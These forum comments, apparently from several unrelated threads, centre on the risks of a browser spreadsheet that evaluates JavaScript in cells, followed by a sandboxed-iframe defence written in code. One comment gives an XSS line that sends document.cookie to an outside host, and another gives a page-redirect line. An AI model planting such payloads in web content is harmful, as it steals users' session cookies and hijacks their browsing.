
The fact that you can put Javascript code which interacts with the cells is awesome.

For example, you can put 10 in A1 and then put "=sum=0;for(i=0;i<A1;i++)sum+=i" in A2 to get the sum from 0 to 10. I really like this.


You may like it, but it is an obvious security flaw. A 'real' product couldn't have this feature, at least not the way it is implemented here.


Please elaborate. (I ask because I am writing a spreadsheet where every cell can be JSON or a JS expression.)

What sort of vulnerabilities does this expose, besides letting the user shoot their feet repeatedly? Cross site scripting?


document.write('<img src="somedomain.com/?'+document.cookie);


But you'd need to send a spreadsheet with that to the victim.


Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.


Have you heard of the HttpOnly attribute for cookies?


Good, send HttpOnly cookies and solve that problem. window.location.href='http://www.redt*be.com'; -- if you think evaluating JS code passed as-is by the client is a good idea, go ahead.


I most definitely will. And if my users want to browse your favorite porn site, I don't see why I shouldn't let them.


Put it in a sandboxed iframe, serve it from a separate domain, and use a very restrictive CSP?
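One way to build what this comment suggests, as an added example (not code from the spreadsheet under discussion). HOST_ORIGIN, SANDBOX_ORIGIN and the evaluator.html path are assumed placeholders; formulas are eval'd only inside an iframe with sandbox="allow-scripts" (opaque origin, so no host cookies or DOM and no top-level navigation) served from a distinct origin under a CSP that denies all network access:

```javascript
const HOST_ORIGIN = 'https://sheet.example';                 // placeholder
const SANDBOX_ORIGIN = 'https://eval.sheet-sandbox.example'; // placeholder, distinct origin

// CSP header the sandbox page must be served with. default-src 'none' blocks the
// <img src="...?cookie"> exfiltration shown earlier in the thread even if anything
// were worth stealing; 'unsafe-eval' is allowed only here, never on the host.
const SANDBOX_CSP =
  "default-src 'none'; script-src 'unsafe-inline' 'unsafe-eval'; form-action 'none'";

const CELL_NAME = /^[A-Z]{1,3}[1-9][0-9]*$/;

// --- runs inside the sandbox page (evaluator.html) ---
// Cell values become parameters of a fresh function so the formula sees A1, B2, ...
// as locals; a direct eval returns the formula's last expression as the cell value,
// e.g. "sum=0;for(i=0;i<A1;i++)sum+=i" with A1=10 yields 45 (i runs 0..9).
function evaluateFormula(source, cells) {
  const names = Object.keys(cells);
  for (const n of names) if (!CELL_NAME.test(n)) throw new Error('bad cell name ' + n);
  const run = new Function(...names, '__src', 'return eval(__src);');
  return run(...names.map((n) => cells[n]), String(source));
}

function installSandboxHandler(win) {
  win.addEventListener('message', (event) => {
    if (event.origin !== HOST_ORIGIN) return; // only the host may submit work
    const { id, formula, cells } = event.data;
    let reply;
    try { reply = { id, value: evaluateFormula(formula, cells) }; }
    catch (e) { reply = { id, error: String(e) }; }
    event.source.postMessage(reply, HOST_ORIGIN);
  });
}

// --- runs on the host page ---
function createSandboxFrame(doc) {
  const frame = doc.createElement('iframe');
  frame.setAttribute('sandbox', 'allow-scripts'); // no allow-same-origin, no allow-top-navigation
  frame.src = SANDBOX_ORIGIN + '/evaluator.html';
  return frame;
}

// A sandboxed frame without allow-same-origin reports origin "null", which any
// other sandboxed frame could also claim, so replies are accepted only from our
// own frame's window object, never on origin alone.
function isTrustedReply(event, frameWindow) {
  return event.source === frameWindow && event.origin === 'null' &&
    event.data !== null && typeof event.data === 'object' && Number.isInteger(event.data.id);
}
```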


Yeah! Better replace it with VB and you've got no security probl... oh wait!


Hey, poster here.

You're right that sync/atomic could've taken care of this; I wasn't aware of that package and figured channels were the way to go in Go.

As for making the waiting chan buffered, the reason I wanted to keep track of pending connections and active connections is because I'd like to proxy from a high-power server to a low-power server such as a Raspberry Pi. I agree with you that it could have been done without, though.

Thanks for the tips! :-)


So perhaps I was a bit harsh. Do check out this set of slides though: http://talks.golang.org/2012/concurrency.slide

One of the last slides: http://talks.golang.org/2012/concurrency.slide#54


Thanks, that's an awesome resource!


Looks great! Just a small typo: "You can also you <em> to italicize your words."


Thanks! Fixed it.


The demo doesn't seem to work on Chrome 25.0.1364.152 m. I'm getting this error whenever I try any of the shortcuts (or when I select a command from the drop down):

Uncaught TypeError: Cannot set property 'curOrigin' of undefined (infer.js:489)

Looks interesting though!


That was another quick update that broke things. I fixed it ~20 minutes after I pushed it, but I guess you hit exactly the window where it was broken.


Just to let you know, Dawson wrote a response to the media which can be seen at http://www.dawsoncollege.qc.ca/

